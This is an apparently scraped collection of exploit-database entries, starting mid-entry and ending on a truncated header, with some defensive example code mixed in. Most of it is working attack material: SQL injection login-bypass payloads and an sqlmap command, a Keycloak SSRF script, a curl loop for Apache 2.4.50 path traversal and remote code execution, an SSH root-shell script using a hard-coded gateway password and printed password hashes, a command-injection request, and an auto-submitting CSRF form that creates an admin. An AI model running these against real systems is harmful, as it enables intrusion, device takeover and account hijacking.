User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 38
Origin: http://localhost
Connection: close
Referer: http://localhost/employment_application/admin/login.php
Cookie: PHPSESSID=fk1gp1s7stu7kitjmhvjfakjqk
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

username='+or+1%3D1--+-&password=admin

--------------------------------------------------------------------------------

B)

1) Vulnerable Parameter: "id"
2) sqlmap command to retrieve tables from the database:
3) python sqlmap.py -u "http://localhost/employment_application/?page=view_vacancy&id=1" --level=3 --risk=2 --banner --dbms=sqlite --tables
-
Keycloak 12.0.1 - 'request_uri ' Blind Server-Side Request Forgery (SSRF) (Unauthenticated)
# Exploit Title: Keycloak 12.0.1 - 'request_uri ' Blind Server-Side Request Forgery (SSRF) (Unauthenticated)
# Date: 2021-10-09
# Exploit Author: Mayank Deshmukh
# Vendor Homepage: https://www.keycloak.org/
# Software Link: https://www.keycloak.org/archive/downloads-12.0.1.html
# Version: versions < 12.0.2
# Tested on: Kali Linux
# CVE : CVE-2020-10770

#!/usr/bin/env python3

import argparse, textwrap
import requests
import sys

parser = argparse.ArgumentParser(description="-=[Keycloak Blind SSRF test by ColdFusionX]=-",
                                 formatter_class=argparse.RawTextHelpFormatter,
                                 epilog=textwrap.dedent('''
                                 Exploit Usage :
                                 ./exploit.py -u http://127.0.0.1:8080
                                 [^] Input Netcat host:port -> 192.168.0.1:4444
                                 '''))
parser.add_argument("-u", "--url", help="Keycloak Target URL (Example: http://127.0.0.1:8080)")
args = parser.parse_args()

if len(sys.argv) <= 2:
    print(f"Exploit Usage: ./exploit.py -h [help] -u [url]")
    sys.exit()

# Variables
Host = args.url
r = requests.session()


def ssrf():
    headerscontent = {
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
    }
    # The attacker-controlled request_uri is fetched server-side by Keycloak,
    # which produces the HTTP callback on the listener.
    hook = input("[^] Input Netcat host:port -> ")
    _req = r.get(f'{Host}/auth/realms/master/protocol/openid-connect/auth'
                 f'?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx'
                 f'&client_id=security-admin-console&request_uri=http://{hook}',
                 headers=headerscontent)
    return True


if __name__ == "__main__":
    print('\n[+] Keycloak Blind SSRF test by ColdFusionX \n ')
    try:
        if ssrf() == True:
            print('\n[+] BINGO! Check Netcat listener for HTTP callback :) \n ')
    except Exception as ex:
        print('\n[-] Invalid URL or Target not Vulnerable')
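The probe above leaves a recognisable trace: an authorization request whose request_uri points at a host the server has no business fetching from. The following detection pass over access-log lines is an added example, not part of the advisory or of Keycloak itself. The log lines are constructed, and the set of hosts from which a request object may legitimately be fetched is an assumption for the demo (a real deployment would derive it from the clients' registered request URIs).

```python
"""Flag OpenID Connect authorization requests whose request_uri points
outside an allowlist of hosts, as the Keycloak SSRF probe above does.
Added example; the log lines and allowlist are constructed."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample: line 1 is the PoC request above, line 4 a cloud
# metadata probe, lines 2 and 3 are benign.
ACCESS_LOG = """\
10.0.0.5 - - [09/Oct/2021:12:00:01 +0000] "GET /auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://192.168.0.1:4444 HTTP/1.1" 400 0
10.0.0.6 - - [09/Oct/2021:12:00:02 +0000] "GET /auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&client_id=app&redirect_uri=https://app.example.com/cb&request_uri=https://app.example.com/par/abc123 HTTP/1.1" 302 0
10.0.0.7 - - [09/Oct/2021:12:00:03 +0000] "GET /auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&client_id=app&redirect_uri=https://app.example.com/cb HTTP/1.1" 302 0
10.0.0.8 - - [09/Oct/2021:12:00:04 +0000] "GET /auth/realms/master/protocol/openid-connect/auth?client_id=app&request_uri=http://169.254.169.254/latest/meta-data/ HTTP/1.1" 400 0
"""

# Assumption for the demo: the only host request objects may be fetched from.
ALLOWED_REQUEST_URI_HOSTS = {"app.example.com"}

# Enough of the common log format to pull out source IP and request target.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def suspicious_request_uri(target, allowed_hosts=ALLOWED_REQUEST_URI_HOSTS):
    """Return the offending request_uri value if an authorization request asks
    the server to fetch a request object from a host outside the allowlist,
    else None."""
    parts = urlsplit(target)
    if not parts.path.endswith("/protocol/openid-connect/auth"):
        return None
    for value in parse_qs(parts.query).get("request_uri", []):
        host = urlsplit(value).hostname
        if host is None or host.lower() not in allowed_hosts:
            return value
    return None


def scan_log(text, allowed_hosts=ALLOWED_REQUEST_URI_HOSTS):
    """Return (source IP, request_uri) for every line that trips the check."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        bad = suspicious_request_uri(m["target"], allowed_hosts)
        if bad is not None:
            hits.append((m["src"], bad))
    return hits


if __name__ == "__main__":
    for src, uri in scan_log(ACCESS_LOG):
        print(f"{src} asked the server to fetch {uri}")
```

The same check works as a pre-filter in front of the authorization endpoint: reject the request when `suspicious_request_uri()` returns a value instead of only logging it.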
-
Apache HTTP Server 2.4.50 - Path Traversal & Remote Code Execution (RCE)
# Exploit: Apache HTTP Server 2.4.50 - Path Traversal & Remote Code Execution (RCE)
# Date: 10/05/2021
# Exploit Author: Lucas Souza https://lsass.io
# Vendor Homepage: https://apache.org/
# Version: 2.4.50
# Tested on: 2.4.50
# CVE : CVE-2021-42013
# Credits: Ash Daulton and the cPanel Security Team

#!/bin/bash

# Usage: ./PoC.sh [TARGET-LIST.TXT] [PATH] [COMMAND]
if [[ $1 == '' ]] || [[ $2 == '' ]]; then
    echo "Set [TARGET-LIST.TXT] [PATH] [COMMAND]"
    echo "./PoC.sh targets.txt /etc/passwd"
    echo "./PoC.sh targets.txt /bin/sh id"
    exit
fi

# Each path segment is the double-encoded form of ".." (%%32%65 -> %2e -> .).
# With a file path the server returns the file; with /bin/sh the POST body
# is fed to the shell as its script (mod_cgi must be enabled for RCE).
for host in $(cat "$1"); do
    echo "$host"
    curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/$2"
done

# PoC.sh targets.txt /etc/passwd
# PoC.sh targets.txt /bin/sh whoami
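Why the PoC spells ".." as %%32%65%%32%65 rather than %2e%2e: the 2.4.50 fix for CVE-2021-41773 rejected ".." segments seen after one percent-decoding pass, but a later stage decoded the path again, and "%%32%65" only turns into "." on that second pass. The following is an added example, not part of the PoC above or of httpd; it models the two-pass behaviour with two calls to `unquote()` (a simplification of httpd's normalisation, stated as an assumption) and the sample request targets are constructed.

```python
"""Two-pass percent-decoding, the reason the double-encoded traversal in
the PoC above gets past the 2.4.50 check.  Added example; the two-pass
model and the sample targets are constructed for the demo."""
from urllib.parse import unquote


def decode_passes(path):
    """Return the path as seen after one and after two decoding passes."""
    once = unquote(path)
    twice = unquote(once)
    return once, twice


def classify_path(path):
    """'traversal' if '..' shows up after one decode (what the 2.4.50 check
    caught), 'double-encoded traversal' if it only shows up after two
    (CVE-2021-42013), otherwise 'clean'."""
    once, twice = decode_passes(path)
    if ".." in once.split("/"):
        return "traversal"
    if ".." in twice.split("/"):
        return "double-encoded traversal"
    return "clean"


# Constructed request targets, e.g. pulled from an access log.
SAMPLE_TARGETS = [
    "/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd",
    "/cgi-bin/.%2e/.%2e/.%2e/etc/passwd",
    "/icons/../etc/passwd",
    "/index.html",
]


def scan_targets(targets):
    """Classify each request target; useful as a log sweep or WAF rule."""
    return [(t, classify_path(t)) for t in targets]


if __name__ == "__main__":
    print("%%32%65 decodes to", decode_passes("%%32%65"))
    for target, verdict in scan_targets(SAMPLE_TARGETS):
        print(f"{verdict:26} {target}")
```

A log sweep that only decodes once will miss the 2.4.50 payload; compare against the twice-decoded path, or simply flag any segment that still contains "%" after the first decode.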
-
Cypress Solutions CTM-200/CTM-ONE - Hard-coded Credentials Remote Root (Telnet/SSH)
# Exploit Title: Cypress Solutions CTM-200/CTM-ONE - Hard-coded Credentials Remote Root (Telnet/SSH)
# Date: 21.09.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.cypress.bc.ca

#!/usr/bin/env python3
#
#
# Cypress Solutions CTM-200/CTM-ONE Hard-coded Credentials Remote Root (Telnet/SSH)
#
#
# Vendor: Cypress Solutions Inc.
# Product web page: https://www.cypress.bc.ca
# Affected version: CTM-ONE (1.3.6-latest)
#                   CTM-ONE (1.3.1)
#                   CTM-ONE (1.1.9)
#                   CTM200 (2.7.1.5659-latest)
#                   CTM200 (2.0.5.3356-184)
#
# Summary: CTM-200 is the industrial cellular wireless gateway for fixed
# and mobile applications. The CTM-200 is a Linux based platform powered
# by ARM Cortex-A8 800 MHz superscalar processor. Its on-board standard
# features make the CTM-200 ideal for mobile fleet applications or fixed
# site office and SCADA communications.
#
# CTM-ONE is the industrial LTE cellular wireless gateway for mobile and
# fixed applications. CTM-ONE is your next generation of gateway for fleet
# tracking and fixed sites.
#
# ======================================================================
# CTM-200
# /var/config/passwd:
# -------------------
# root:$1$5RS5yR6V$Lo9QCp3rB/7UCU8fRq5ec0:0:0:root:/root:/bin/ash
# admin:$1$5RS5yR6V$Lo9QCp3rB/7UCU8fRq5ec0:0:0:root:/root:/bin/ash
# nobody:*:65534:65534:nobody:/var:/bin/false
# daemon:*:65534:65534:daemon:/var:/bin/false
#
# /var/config/advanced.ini:
# -------------------------
# 0
# 0
# Chameleon
# 0,0,0,0,0,255
# 0,0,0,0,0,255
# 0,0,0,0,0,255
# 0,0,0,0,0,255
# 0,0,0,0,0,255
# 0,0,0,0,0,255
#
#
# CTM-ONE
# /etc/shadow:
# ------------
# admin:$6$l22Co5pX$.TzqtAF55KX2XkQrjENNkqQfRBRB2ai0ujayHE5Ese7SdcxkXf1EPQqDv3/d2u3D/OHlgngU8f9Pn5.gO61vx/:17689:0:99999:7:::
# root:$6$5HHLZqFi$Gw4IfW2NBiwce/kMpc2JGM1byduuiJJy/Z7YhKQjSi4JSx8cur0FYhSDmg5iTXaehqu/d6ZtxNZtECZhLJrLC/:17689:0:99999:7:::
# daemon:*:16009:0:99999:7:::
# bin:*:16009:0:99999:7:::
# sys:*:16009:0:99999:7:::
# ftp:*:16009:0:99999:7:::
# nobody:*:16009:0:99999:7:::
# messagebus:!:16009:0:99999:7:::
# ======================================================================
#
# Desc: The CTM-200 and CTM-ONE are vulnerable to hard-coded credentials
# within their Linux distribution image. This weakness can lead to the
# exposure of resources or functionality to unintended actors, providing
# attackers with sensitive information including executing arbitrary code.
#
# Tested on: GNU/Linux 4.1.15-1.2.0+g77f6154 (arm7l)
#            GNU/Linux 2.6.32.25 (arm4tl)
#            lighttpd/1.4.39
#            BusyBox v1.24.1
#            BusyBox v1.15.3
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2021-5686
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5686.php
#
#
# 21.09.2021
#

import sys
import paramiko

bnr = '''
 o ┌─┐┌┬┐┌─┐  ┌─┐  ┬─┐┌─┐┌─┐┌┬┐┌─┐┬ ┬┌─┐┬  ┬
 o │ │││││ ┬  ├─┤  ├┬┘│ ││ │ │ └─┐├─┤├┤ │  │
 o └─┘┴ ┴└─┘  ┴ ┴  ┴└─└─┘└─┘ ┴ └─┘┴ ┴└─┘┴─┘┴─┘
 o
'''

print(bnr)

if len(sys.argv) < 2:
    print('Put an IP.')
    sys.exit()

adrs = sys.argv[1]
unme = 'root'       # 'admin' shares the same hash on the CTM-200
pwrd = 'Chameleon'  # hard-coded password shipped in the firmware image

# Interactive root shell over SSH using the hard-coded credentials.
rsh = paramiko.SSHClient()
rsh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
rsh.connect(adrs, username=unme, password=pwrd)

while 1:
    cmnd = input('# ')
    if cmnd == 'exit':
        break
    stdin, stdout, stderr = rsh.exec_command(cmnd)
    stdin.close()
    print(str(stdout.read().decode()))

rsh.close()
-
Cypress Solutions CTM-200 2.7.1 - Root Remote OS Command Injection
# Exploit Title: Cypress Solutions CTM-200 2.7.1 - Root Remote OS Command Injection
# Date: 21.09.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.cypress.bc.ca

Cypress Solutions CTM-200 2.7.1 Root Remote OS Command Injection


Vendor: Cypress Solutions Inc.
Product web page: https://www.cypress.bc.ca
Affected version: 2.7.1.5659
                  2.0.5.3356-184

Summary: CTM-200 is the industrial cellular wireless gateway for fixed
and mobile applications. The CTM-200 is a Linux based platform powered
by ARM Cortex-A8 800 MHz superscalar processor. Its on-board standard
features make the CTM-200 ideal for mobile fleet applications or fixed
site office and SCADA communications.

Desc: The CTM-200 wireless gateway suffers from an authenticated semi-blind
OS command injection vulnerability. This can be exploited to inject and
execute arbitrary shell commands as the root user through the
'ctm-config-upgrade.sh' script leveraging the 'fw_url' POST parameter used
in the cmd upgradefw as argument, called by ctmsys() as pointer to execv()
and make_wget_url() function to the wget command in /usr/bin/cmdmain ELF
binary.

================================================================================================
/www/cgi-bin/webif/ctm-config-upgrade.sh:
-----------------------------------------

136: if ! empty "$FORM_install_fw_url"; then
137:     echo "</pre>"
138:     echo "<br />Installing firmware to flash ... DO NOT POWER OFF CTM-200 Gateway!<br /><pre>"
139:     cmd upgradefw "$FORM_fw_url"
140:     unset FORM_install_fw_url FORM_submit
141:     echo "</pre><br />Done."
142: fi

==================================================================
cmdmain (ELF):

memset(&DAT_0003bd1c,0,0x80);
make_wget_url(*ppcVar9,&DAT_0003bd9c,&DAT_0003bdbc,&DAT_0003bd1c);
sprintf(local_184,"%s%s -O /tmp/%s",&DAT_0003bd1c,*(undefined4 *)(iParm2 + 8),
        *(undefined4 *)(iParm2 + 8));
ctmsys(local_184);
sprintf(local_184,"/tmp/%s",*(undefined4 *)(iParm2 + 8));
iVar3 = ctm_fopen(local_184,"r");
if (iVar3 == 0) {
  uVar5 = *(undefined4 *)(iParm2 + 8);
  __s = "vueclient -cmdack \'confupgrade:%s FAIL DOWNLOAD\' &";
  goto LAB_0001f4a8;
}
ctm_fclose();
memset(local_184,0,0x100);
sprintf(local_184,"%s%s.md5 -O /tmp/%s.md5",&DAT_0003bd1c,*(undefined4 *)(iParm2 + 8),
        *(undefined4 *)(iParm2 + 8));
ctmsys(local_184);

=================================================================
cmd (ELF):

while (sVar1 = strlen(__s2), uVar7 < sVar1) {
  __s2[uVar7] = *(char *)(__ctype_tolower + (uint)(byte)__s2[uVar7] * 2);
  __s2 = *ppcVar8;
  uVar7 = uVar7 + 1;
}
uStack180 = 0x7273752f;
uStack176 = 0x6e69622f;
uStack172 = 0x646d632f;
uStack168 = 0x6d632f73;
uStack164 = 0x69616d64;
uStack160 = 0x6e;
uStack159 = 0;
iVar2 = execv((char *)&uStack180,ppcParm2);
================================================================================================

Tested on: GNU/Linux 2.6.32.25 (arm4tl)
           BusyBox v1.15.3


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2021-5687
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5687.php


21.09.2021

--


PoC POST request:
-----------------

POST /cgi-bin/webif/ctm-config-upgrade.sh HTTP/1.1
Host: 192.168.1.100
Connection: keep-alive
Content-Length: 611
Cache-Control: max-age=0
Authorization: Basic YWRtaW46Q2hhbWVsZW9u
Upgrade-Insecure-Requests: 1
Origin: http://192.168.1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZlABvwQnpLtpe9mM
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://173.182.107.198/cgi-bin/webif/ctm-config-upgrade.sh
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6
Cookie: style=null
sec-gpc: 1

------WebKitFormBoundaryZlABvwQnpLtpe9mM
Content-Disposition: form-data; name="submit"

1
------WebKitFormBoundaryZlABvwQnpLtpe9mM
Content-Disposition: form-data; name="upgradefile"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryZlABvwQnpLtpe9mM
Content-Disposition: form-data; name="fw_url"

`id`
------WebKitFormBoundaryZlABvwQnpLtpe9mM
Content-Disposition: form-data; name="install_fw_url"

Start Firmware Upgrade from URL
------WebKitFormBoundaryZlABvwQnpLtpe9mM
Content-Disposition: form-data; name="pkgurl"


------WebKitFormBoundaryZlABvwQnpLtpe9mM--

Response:
---------

HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...
...
Firmware Management
Installing firmware to flash ... DO NOT POWER OFF CTM-200 Gateway!
Saving configuration ... downloading firmware image: gid=0(root)/uid=0(root).tar
found image: extracting image files
Verifying checksum of downloaded firmware image
Image checksum failed
OK
Done.
...
...
</div>
<br />
<fieldset id="save">
<legend><strong>Proceed Changes</strong></legend>
<div class="page-save"><input id="savebutton" type="submit" name="action" value="Save Changes to Page" /></div>
<ul class="apply">
<li><a href="config.sh?mode=save&cat=Config&prev=/cgi-bin/webif/ctm-config-upgrade.sh" rel="lightbox" >» Save Configuration «</a></li>
</ul>
</fieldset>
</form>
<hr />
<div id="footer">
<h3>X-Wrt</h3>
<em>End user extensions for OpenWrt</em>
</div>
</div> <!-- End #container -->
</body>
</html>
-
Pharmacy Point of Sale System 1.0 - 'Add New User' Cross-Site Request Forgery (CSRF)
# Exploit Title: Pharmacy Point of Sale System 1.0 - 'Add New User' Cross-Site Request Forgery (CSRF)
# Date: 10/11/2021
# Exploit Author: Murat DEMIRCI (@butterflyhunt3r)
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/14957/pharmacy-point-sale-system-using-php-and-sqlite-free-source-code.html
# Version: 1
# Tested on: Windows 10

Detail: The application does not use any security token to protect against CSRF. Therefore, a malicious user can add a new administrator user account by using a crafted POST request.

CSRF PoC:
--------------------------------------------------------------------------------------

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/pharmacy/Actions.php?a=save_user" method="POST">
      <input type="hidden" name="id" value="" />
      <input type="hidden" name="fullname" value="Mrt" />
      <input type="hidden" name="username" value="NewAdmin" />
      <input type="hidden" name="type" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

--------------------------------------------------------------------------------------
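What the save_user action is missing is a per-session token that the cross-site form above cannot know, backed by an Origin/Referer check. The following is an added example, not code from the advisory or from the pharmacy project: the session object, the in-memory user store, the form field names (taken from the PoC) and the site origin are assumptions for the demo.

```python
"""Synchronizer-token CSRF check for an 'add user' action, modelled on the
PoC form above.  Added example; session, user store and origin are
constructed for the demo."""
import hmac
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "http://localhost"  # assumption: where the application is served


class Session:
    """Stand-in for PHP's $_SESSION: one random token minted per session."""

    def __init__(self):
        self.csrf_token = secrets.token_hex(32)
        self.user_id = 1  # the logged-in admin whose browser the PoC abuses


def user_form_html(session):
    """The legitimate page embeds the token; a page on another origin
    cannot read it, so its forged POST cannot include it."""
    return (
        f'<form action="{SITE_ORIGIN}/pharmacy/Actions.php?a=save_user" method="POST">\n'
        f'  <input type="hidden" name="csrf_token" value="{session.csrf_token}" />\n'
        '  <input type="text" name="username" />\n'
        '</form>'
    )


def same_origin(value, site_origin=SITE_ORIGIN):
    """Compare scheme, host and port of an Origin/Referer value with ours."""
    a, b = urlsplit(value), urlsplit(site_origin)
    return (a.scheme, a.hostname, a.port) == (b.scheme, b.hostname, b.port)


def csrf_ok(session, headers, form):
    """Token must match in constant time, and if the browser sent Origin
    (or Referer) it must be ours.  A missing token fails, it does not pass."""
    token = form.get("csrf_token", "")
    if not token or not hmac.compare_digest(token, session.csrf_token):
        return False
    origin = headers.get("Origin") or headers.get("Referer")
    if origin and not same_origin(origin):
        return False
    return True


def save_user(session, headers, form, users):
    """Guarded 'Add New User' action: appends to users and returns True only
    when the CSRF check passes."""
    if not csrf_ok(session, headers, form):
        return False
    users.append({"fullname": form.get("fullname", ""),
                  "username": form["username"],
                  "type": int(form.get("type", 2))})
    return True


if __name__ == "__main__":
    sess, users = Session(), []
    # The PoC page above: cross-site POST, no token, attacker's Origin.
    poc_headers = {"Origin": "http://attacker.example"}
    poc_form = {"id": "", "fullname": "Mrt", "username": "NewAdmin", "type": "1"}
    print("PoC accepted:  ", save_user(sess, poc_headers, poc_form, users))
    legit_form = dict(poc_form, csrf_token=sess.csrf_token)
    print("legit accepted:", save_user(sess, {"Origin": SITE_ORIGIN}, legit_form, users))
    print(user_form_html(sess))
```

Setting the session cookie with SameSite=Lax or Strict closes the same hole for top-level cross-site POSTs in current browsers, but the token check is what holds regardless of cookie policy, so keep both.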
-
Simple Issue Tracker System 1.0 - SQLi Authentication Bypass
# Exploit Title: Simple Issue Tracker System 1.0 - SQLi Authentication Bypass
# Date: 11.10.2021
# Exploit Author: Bekir Bugra TURKOGLU
# Vendor Homepage: https://www.sourcecodester.com/php/14938/simple-issue-tracker-system-project-using-php-and-sqlite-free-download.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14938&title=Simple+Issue+Tracker+System+Project+using+PHP+and+SQLite+Source+Code+Free+Download
# Version: 1.0
# Tested on: Windows 10, Kali Linux

# Loan Management System Login page can be bypassed with a simple SQLi to the username parameter.

Steps To Reproduce:

1 - Go to the login page http://localhost/issue_tracker/login.php
2 - Enter the payload to the username field as "admin" or " ' OR 1 -- - " and enter any character in the password field.
3 - Click on the "Login" button and the login succeeds.

PoC

POST /issue_tracker/Actions.php?a=login HTTP/1.1
Host: 192.168.0.111
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 31
Origin: http://localhost
Connection: close
Referer: http://localhost/issue_tracker/login.php
Cookie: PHPSESSID=71bod5tipklk329lpsoqkvfcb9

username='+OR+1+--+-&password=1
-
Online Learning System 2.0 - 'Multiple' SQLi Authentication Bypass
# Exploit Title: Online Learning System 2.0 - 'Multiple' SQLi Authentication Bypass
# Date: 11.10.2021
# Exploit Author: Oguzhan Kara
# Vendor Homepage: https://www.sourcecodester.com/php/14929/online-learning-system-v2-using-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14929&title=Online+Learning+System+V2+using+PHP+Free+Source+Code
# Version: 2.0
# Tested on: Kali Linux, Windows 10 - XAMPP

# Online Learning System v2.0 Login pages can be bypassed with a simple SQLi to the username/facultyID/studentID parameters.

Steps To Reproduce:

1 - Go to one of the login portals
2 - Enter the payload to the username field as "bypass' or 1=1-- -" without double-quotes ("bypass" can be anything in this scenario) and type anything you want into the password field.
3 - Click on the "Login" button and you are logged in as the first user in the database, which is the admin user for the admin portal.

PoC

---Admin Portal---

POST /elearning/classes/Login.php?f=login HTTP/1.1
Host: localhost
Content-Length: 45
sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="94"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/elearning/admin/login.php
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=arkil63kkqsabj3b8cf3oimm2j; __news247__logged=1; __news247__key=4599c04802b500f180c29bc60bdf1923
Connection: close

username=bypass'+or+1%3D1--+-&password=bypass

---Faculty Portal---

POST /elearning/classes/Login.php?f=flogin HTTP/1.1
Host: localhost
Content-Length: 47
sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="94"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/elearning/faculty/login.php
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=arkil63kkqsabj3b8cf3oimm2j; __news247__logged=1; __news247__key=4599c04802b500f180c29bc60bdf1923
Connection: close

faculty_id=bypass'+or+1%3D1--+-&password=bypass

---Student Portal---

POST /elearning/classes/Login.php?f=slogin HTTP/1.1
Host: localhost
Content-Length: 45
sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="94"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/elearning/student/login.php
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=arkil63kkqsabj3b8cf3oimm2j; __news247__logged=1; __news247__key=4599c04802b500f180c29bc60bdf1923
Connection: close

student_id=bypass'+or+1%3D1--+-&password=test
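The login bypasses in the Simple Payroll, Recruitment Management, Issue Tracker and Online Learning posts above share one root cause: the username is spliced into the SQL text, so "' or 1=1-- -" turns the WHERE clause into a tautology and the first row in the table (the admin) is returned, while "admin' or '1'='1" matches the admin row outright because AND binds tighter than OR. The following is an added example, not code from any of the advisories or from the affected sourcecodester projects: it rebuilds that query against an in-memory SQLite table (the same engine those projects use) beside the parameterised form that makes the payloads inert. The table layout, the seeded accounts and the MD5 password storage are constructed for the demo.

```python
"""Login query built from raw input vs. the same query with bound
parameters, run against SQLite.  Added example; the users table and
credentials are constructed for the demo."""
import hashlib
import sqlite3


def make_db():
    """In-memory users table, admin inserted first (constructed data)."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, type INTEGER)"
    )
    seed = [("admin", "admin123", 1), ("alice", "hunter2", 2)]
    con.executemany(
        "INSERT INTO users (username, password, type) VALUES (?, ?, ?)",
        [(u, hashlib.md5(p.encode()).hexdigest(), t) for u, p, t in seed],
    )
    con.commit()
    return con


def vulnerable_sql(username, password):
    """The query shape behind the bypasses: input pasted into the SQL text."""
    pw = hashlib.md5(password.encode()).hexdigest()
    return f"SELECT username FROM users WHERE username = '{username}' AND password = '{pw}'"


def login_vulnerable(con, username, password):
    """Return the username the query matches, or None.  With the payloads
    above the WHERE clause is always true, so the first row (admin) wins."""
    row = con.execute(vulnerable_sql(username, password)).fetchone()
    return row[0] if row else None


def login_safe(con, username, password):
    """Same query with placeholders: the quote and the '--' in the input are
    compared as data, never parsed as SQL."""
    pw = hashlib.md5(password.encode()).hexdigest()
    row = con.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, pw),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    for payload in ("' or 1=1-- -", "admin' or '1'='1"):
        print(vulnerable_sql(payload, "anything"))
        print("  vulnerable ->", login_vulnerable(db, payload, "anything"))
        print("  safe       ->", login_safe(db, payload, "anything"))
```

Printing `vulnerable_sql()` shows why the trailing "-" in the payloads is harmless: everything after "--" up to the end of the line, including the AND password clause, is a comment to SQLite.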
-
Student Quarterly Grading System 1.0 - 'grade' Stored Cross-Site Scripting (XSS)
# Exploit Title: Student Quarterly Grading System 1.0 - 'grade' Stored Cross-Site Scripting (XSS)
# Date: 11.10.2021
# Exploit Author: Hüseyin Serkan Balkanli
